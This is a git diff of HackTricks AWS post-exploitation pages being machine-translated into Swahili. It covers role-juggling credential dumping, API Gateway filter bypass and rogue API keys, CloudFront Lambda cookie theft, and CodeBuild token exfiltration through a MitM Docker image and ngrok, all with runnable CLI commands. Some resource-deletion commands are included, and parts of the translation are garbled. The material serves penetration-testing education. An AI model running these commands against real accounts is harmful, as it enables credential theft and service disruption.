usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
optional arguments:
- -h, --help show this help message and exit
- -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
```
-
> [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> Kumbuka kwamba skripti ya [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) kutoka kwenye hifadhi hiyo ya Github haipati njia zote ambazo mnyororo wa jukumu unaweza kuundwa.
Code to perform Role Juggling from PowerShell
-
```powershell
# PowerShell script to check for role juggling possibilities using AWS CLI
# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
- Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
- exit
+Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+exit
}
# Function to list IAM roles
function List-IAMRoles {
- aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}
# Initialize error count
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
# Attempt to assume each role
foreach ($role in $roles) {
- $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($credentials) {
- Write-Host "Successfully assumed role: $($role.RoleName)"
- Write-Host "Access Key: $($credentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
- Write-Host "Session Token: $($credentials.SessionToken)"
- Write-Host "Expiration: $($credentials.Expiration)"
+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($credentials) {
+Write-Host "Successfully assumed role: $($role.RoleName)"
+Write-Host "Access Key: $($credentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+Write-Host "Session Token: $($credentials.SessionToken)"
+Write-Host "Expiration: $($credentials.Expiration)"
- # Set temporary credentials to assume the next role
- $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
- $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
- $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+# Set temporary credentials to assume the next role
+$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+$env:AWS_SESSION_TOKEN = $credentials.SessionToken
- # Try to assume another role using the temporary credentials
- foreach ($nextRole in $roles) {
- if ($nextRole.Arn -ne $role.Arn) {
- $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($nextCredentials) {
- Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
- Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
- Write-Host "Session Token: $($nextCredentials.SessionToken)"
- Write-Host "Expiration: $($nextCredentials.Expiration)"
- }
- } catch {
- $errorCount++
- }
- }
- }
+# Try to assume another role using the temporary credentials
+foreach ($nextRole in $roles) {
+if ($nextRole.Arn -ne $role.Arn) {
+$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($nextCredentials) {
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+Write-Host "Session Token: $($nextCredentials.SessionToken)"
+Write-Host "Expiration: $($nextCredentials.Expiration)"
+}
+} catch {
+$errorCount++
+}
+}
+}
- # Reset environment variables
- Remove-Item Env:\AWS_ACCESS_KEY_ID
- Remove-Item Env:\AWS_SECRET_ACCESS_KEY
- Remove-Item Env:\AWS_SESSION_TOKEN
- } else {
- $errorCount++
- }
- } catch {
- $errorCount++
- }
+# Reset environment variables
+Remove-Item Env:\AWS_ACCESS_KEY_ID
+Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+Remove-Item Env:\AWS_SESSION_TOKEN
+} else {
+$errorCount++
+}
+} catch {
+$errorCount++
+}
}
# Output the number of errors if any
if ($errorCount -gt 0) {
- Write-Host "$errorCount error(s) occurred during role assumption attempts."
+Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
- Write-Host "No errors occurred. All roles checked successfully."
+Write-Host "No errors occurred. All roles checked successfully."
}
Write-Host "Role juggling check complete."
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index 53f79d916..a63b28b33 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,6 +1 @@
-# AWS - Post Exploitation
-
-
-
-
-
+# AWS - Baada ya Kutumia
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
index 4847c40e0..c9a1e15a3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -4,48 +4,43 @@
## API Gateway
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
-### Access unexposed APIs
+### Upataji wa APIs zisizo wazi
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+Unaweza kuunda kiunganishi katika [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) na huduma `com.amazonaws.us-east-1.execute-api`, funua kiunganishi katika mtandao ambapo una ufikiaji (labda kupitia mashine ya EC2) na piga kundi la usalama linaloruhusu mawasiliano yote.\
+Kisha, kutoka kwa mashine ya EC2 utaweza kufikia kiunganishi na hivyo kuita API ya gateway ambayo haikuwa wazi hapo awali.
-### Bypass Request body passthrough
+### Kupita kupitia mwili wa Ombi
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+Teknolojia hii ilipatikana katika [**hii CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
-
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+Kama ilivyoonyeshwa katika [**nyaraka za AWS**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) katika sehemu ya `PassthroughBehavior`, kwa default, thamani **`WHEN_NO_MATCH`**, wakati wa kuangalia kichwa cha **Content-Type** cha ombi, itapitisha ombi kwa nyuma bila mabadiliko.
+Hivyo, katika CTF, API Gateway ilikuwa na kiolezo cha uunganisho ambacho kilikuwa **kikizuia bendera kutolewa** katika jibu wakati ombi lilitumwa na `Content-Type: application/json`:
```yaml
RequestTemplates:
- application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
```
+Hata hivyo, kutuma ombi lenye **`Content-type: text/json`** kungesitisha chujio hicho.
-However, sending a request with **`Content-type: text/json`** would prevent that filter.
-
-Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
-
+Hatimaye, kwa kuwa API Gateway ilikuwa ikiruhusu tu `Get` na `Options`, ilikuwa inawezekana kutuma uchunguzi wa dynamoDB bila kikomo kwa kutuma ombi la POST lenye uchunguzi katika mwili na kutumia kichwa `X-HTTP-Method-Override: GET`:
```bash
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
```
-
### Usage Plans DoS
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
+Katika sehemu ya **Enumeration** unaweza kuona jinsi ya **kupata mpango wa matumizi** wa funguo. Ikiwa una funguo na ime **punguzia** matumizi X **kwa mwezi**, unaweza **kuitumia tu na kusababisha DoS**.
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+**API Key** inahitaji tu **kujumuishwa** ndani ya **HTTP header** inayoitwa **`x-api-key`**.
### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateGatewayResponse` na `apigateway:CreateDeployment` anaweza **kubadilisha Jibu la Gateway lililopo ili kujumuisha vichwa vya habari vya kawaida au templeti za majibu ambazo zinavuja taarifa nyeti au kutekeleza scripts za uhalifu**.
```bash
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Madhara Yanayoweza Kutokea**: Kuvuja kwa taarifa nyeti, kutekeleza skripti zenye uharibifu, au ufikiaji usioidhinishwa wa rasilimali za API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateStage` na `apigateway:CreateDeployment` anaweza **kubadilisha hatua ya API Gateway iliyopo ili kuelekeza trafiki kwenye hatua tofauti au kubadilisha mipangilio ya caching ili kupata ufikiaji usioidhinishwa wa data iliyohifadhiwa**.
```bash
API_ID="your-api-id"
STAGE_NAME="Prod"
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+**Madhara Yanayoweza Kutokea**: Ufikiaji usioidhinishwa wa data iliyohifadhiwa, kuingilia au kuzuia trafiki ya API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Mshambuliaji mwenye ruhusa `apigateway:PutMethodResponse` na `apigateway:CreateDeployment` anaweza **kubadilisha jibu la njia ya API Gateway REST API iliyopo ili kujumuisha vichwa vya habari vya kawaida au templeti za majibu ambazo zinavuja taarifa nyeti au kutekeleza scripts zenye uharibifu**.
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Madhara Yanayoweza Kutokea**: Kuvuja kwa taarifa nyeti, kutekeleza skripti zenye uharibifu, au ufikiaji usioidhinishwa wa rasilimali za API.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
-
+Mshambuliaji mwenye ruhusa `apigateway:UpdateRestApi` na `apigateway:CreateDeployment` anaweza **kubadilisha mipangilio ya API Gateway REST API ili kuzima uandishi wa kumbukumbu au kubadilisha toleo la chini la TLS, ambayo inaweza kudhoofisha usalama wa API**.
```bash
API_ID="your-api-id"
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**Madhara Yanayoweza Kutokea**: Kupunguza usalama wa API, ambayo inaweza kuruhusu ufikiaji usioidhinishwa au kufichua taarifa nyeti.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
-
+Mshambuliaji mwenye ruhusa `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, na `apigateway:CreateUsagePlanKey` anaweza **kuunda funguo mpya za API, kuziunganisha na mipango ya matumizi, na kisha kutumia funguo hizi kwa ufikiaji usioidhinishwa kwa APIs**.
```bash
# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
```
-
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+**Madhara Yanayoweza Kutokea**: Ufikiaji usioidhinishwa wa rasilimali za API, kupita kwenye udhibiti wa usalama.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
index 4a3c4ff21..549d88a29 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -4,7 +4,7 @@
## CloudFront
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-cloudfront-enum.md
@@ -12,24 +12,20 @@ For more information check:
### Man-in-the-Middle
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+Hii [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) inapendekeza hali kadhaa tofauti ambapo **Lambda** inaweza kuongezwa (au kubadilishwa ikiwa tayari inatumika) katika **mawasiliano kupitia CloudFront** kwa lengo la **kuiba** taarifa za mtumiaji (kama **cookie** ya kikao) na **kubadilisha** **jibu** (kuingiza script mbaya ya JS).
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+#### scenario 1: MitM ambapo CloudFront imewekwa kufikia HTML fulani ya bucket
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+- **Unda** **function** mbaya.
+- **Unganisha** na usambazaji wa CloudFront.
+- Weka **aina ya tukio kuwa "Viewer Response"**.
-Accessing the response you could steal the users cookie and inject a malicious JS.
+Kwa kufikia jibu unaweza kuiba cookie za watumiaji na kuingiza JS mbaya.
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### scenario 2: MitM ambapo CloudFront tayari inatumia kazi ya lambda
-- **Modify the code** of the lambda function to steal sensitive information
+- **Badilisha msimbo** wa kazi ya lambda ili kuiba taarifa nyeti
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+Unaweza kuangalia [**msimbo wa tf ili kuunda hali hizi hapa**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
index 54be4e299..a0535b447 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -4,85 +4,73 @@
## CodeBuild
-For more information, check:
+Kwa maelezo zaidi, angalia:
{{#ref}}
../../aws-services/aws-codebuild-enum.md
{{#endref}}
-### Check Secrets
+### Angalia Siri
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+Ikiwa akidi zimewekwa katika Codebuild kuungana na Github, Gitlab au Bitbucket kwa njia ya alama za kibinafsi, nywila au ufikiaji wa alama za OAuth, hizi **akidi zitawekwa kama siri katika meneja wa siri**.\
+Hivyo, ikiwa una ufikiaji wa kusoma meneja wa siri utaweza kupata hizi siri na kuhamasisha kwenye jukwaa lililounganishwa.
{{#ref}}
../../aws-privilege-escalation/aws-secrets-manager-privesc.md
{{#endref}}
-### Abuse CodeBuild Repo Access
+### Tumia Upatikanaji wa Repo ya CodeBuild
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+Ili kuunda **CodeBuild**, itahitaji **ufikiaji wa repo ya msimbo** ambayo itakuwa ikitumia. Jukwaa kadhaa zinaweza kuwa zinahifadhi msimbo huu:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+Mradi wa **CodeBuild lazima uwe na ufikiaji** wa mtoa huduma wa chanzo ulioanzishwa, ama kupitia **IAM role** au kwa kutumia **token ya github/bitbucket au ufikiaji wa OAuth**.
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+Mshambuliaji mwenye **idhini za juu katika CodeBuild** anaweza kutumia ufikiaji huu ulioanzishwa kuvuja msimbo wa repo iliyoanzishwa na zingine ambapo akidi zilizowekwa zina ufikiaji.\
+Ili kufanya hivyo, mshambuliaji atahitaji tu **kubadilisha URL ya hifadhi kwa kila repo ambayo akidi za usanidi zina ufikiaji** (kumbuka kwamba wavuti ya aws itataja zote kwako):
-And **change the Buildspec commands to exfiltrate each repo**.
+Na **kubadilisha amri za Buildspec ili kuhamasisha kila repo**.
> [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> Hata hivyo, hii **kazi ni ya kurudiwa na inachosha** na ikiwa token ya github ilipangwa na **idhini za kuandika**, mshambuliaji **hataweza (ku) kutumia hizo idhini** kwani hana ufikiaji wa token hiyo.\
+> Au ana? Angalia sehemu inayofuata
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+### Kuvaa Alama za Ufikiaji kutoka AWS CodeBuild
+Unaweza kuvuja ufikiaji uliopewa katika CodeBuild kwa jukwaa kama Github. Angalia ikiwa ufikiaji wowote kwa jukwaa za nje ulitolewa kwa:
```bash
aws codebuild list-source-credentials
```
-
{{#ref}}
aws-codebuild-token-leakage.md
{{#endref}}
### `codebuild:DeleteProject`
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
+Mshambuliaji anaweza kufuta mradi mzima wa CodeBuild, na kusababisha kupoteza usanidi wa mradi na kuathiri programu zinazotegemea mradi huo.
```bash
aws codebuild delete-project --name
```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**Madhara Yanayoweza Kutokea**: Kupoteza usanidi wa mradi na usumbufu wa huduma kwa programu zinazotumia mradi uliofutwa.
### `codebuild:TagResource` , `codebuild:UntagResource`
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Mshambuliaji anaweza kuongeza, kubadilisha, au kuondoa lebo kutoka kwa rasilimali za CodeBuild, akisababisha usumbufu katika ugawaji wa gharama wa shirika lako, ufuatiliaji wa rasilimali, na sera za udhibiti wa ufikiaji kulingana na lebo.
```bash
aws codebuild tag-resource --resource-arn --tags
aws codebuild untag-resource --resource-arn --tag-keys
```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Madhara Yanayoweza Kutokea**: Kuingiliwa kwa ugawaji wa gharama, ufuatiliaji wa rasilimali, na sera za udhibiti wa ufikiaji kulingana na lebo.
### `codebuild:DeleteSourceCredentials`
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
+Mshambuliaji anaweza kufuta akiba za chanzo kwa ajili ya ghala la Git, na kuathiri utendaji wa kawaida wa programu zinazotegemea ghala hilo.
```sql
aws codebuild delete-source-credentials --arn
```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**Madhara Yanayoweza Kutokea**: Kuingiliwa kwa utendaji wa kawaida wa programu zinazotegemea hazina iliyoathirika kutokana na kuondolewa kwa hati za chanzo.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index c514d7a7c..37e283bc5 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -4,71 +4,66 @@
## Recover Github/Bitbucket Configured Tokens
-First, check if there are any source credentials configured that you could leak:
-
+Kwanza, angalia kama kuna akauti za chanzo zilizowekwa ambazo unaweza kuvuja:
```bash
aws codebuild list-source-credentials
```
-
### Via Docker Image
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+Ikiwa unapata kuwa uthibitisho kwa mfano Github umewekwa katika akaunti, unaweza **kuondoa** hiyo **ufikiaji** (**GH token au OAuth token**) kwa kufanya Codebuild **itumie picha maalum ya docker** kuendesha ujenzi wa mradi.
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+Kwa kusudi hili unaweza **kuunda mradi mpya wa Codebuild** au kubadilisha **mazingira** ya moja iliyopo ili kuweka **picha ya Docker**.
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+Picha ya Docker unayoweza kutumia ni [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Hii ni picha ya Docker ya msingi sana ambayo itaweka **env variables `https_proxy`**, **`http_proxy`** na **`SSL_CERT_FILE`**. Hii itakuruhusu kukamata sehemu kubwa ya trafiki ya mwenyeji iliyoonyeshwa katika **`https_proxy`** na **`http_proxy`** na kuamini SSL CERT iliyoonyeshwa katika **`SSL_CERT_FILE`**.
-1. **Create & Upload your own Docker MitM image**
- - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
- - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
- - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
- - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
- - Create a **new Codebuild project** or **modify** the environment of an existing one.
- - Set the project to use the **previously generated Docker image**
+1. **Unda & Pakia picha yako ya Docker MitM**
+- Fuata maelekezo ya repo kuweka anwani yako ya IP ya proxy na kuweka cheti chako cha SSL na **ujenge picha ya docker**.
+- **USIWEKE `http_proxy`** ili usikamate maombi kwa kiungo cha metadata.
+- Unaweza kutumia **`ngrok`** kama `ngrok tcp 4444` kuweka proxy kwa mwenyeji wako.
+- Mara tu unapokuwa na picha ya Docker iliyojengwa, **paki kwenye repo ya umma** (Dockerhub, ECR...)
+2. **Weka mazingira**
+- Unda **mradi mpya wa Codebuild** au **badilisha** mazingira ya moja iliyopo.
+- Weka mradi kutumia **picha ya Docker iliyozalishwa awali**
-3. **Set the MitM proxy in your host**
-
-- As indicated in the **Github repo** you could use something like:
+3. **Weka proxy ya MitM katika mwenyeji wako**
+- Kama ilivyoonyeshwa katika **repo ya Github** unaweza kutumia kitu kama:
```bash
mitmproxy --listen-port 4444 --allow-hosts "github.com"
```
-
> [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> The **mitmproxy version used was 9.0.1**, iliripotiwa kwamba na toleo la 10 hii inaweza isifanye kazi.
-4. **Run the build & capture the credentials**
+4. **Kimbia ujenzi & kamata akreditivu**
-- You can see the token in the **Authorization** header:
+- Unaweza kuona token katika kichwa cha **Authorization**:
-
-
-This could also be done from the aws cli with something like
+
+Hii pia inaweza kufanywa kutoka kwa aws cli na kitu kama
```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
## With /tmp/buildspec.json
{
- "name": "my-demo-project",
- "source": {
- "type": "GITHUB",
- "location": "https://github.com/uname/repo",
- "buildspec": "buildspec.yml"
- },
- "artifacts": {
- "type": "NO_ARTIFACTS"
- },
- "environment": {
- "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
- "image": "docker.io/carlospolop/docker-mitm:v12",
- "computeType": "BUILD_GENERAL1_SMALL",
- "imagePullCredentialsType": "CODEBUILD"
- }
+"name": "my-demo-project",
+"source": {
+"type": "GITHUB",
+"location": "https://github.com/uname/repo",
+"buildspec": "buildspec.yml"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+"image": "docker.io/carlospolop/docker-mitm:v12",
+"computeType": "BUILD_GENERAL1_SMALL",
+"imagePullCredentialsType": "CODEBUILD"
+}
}
## Json
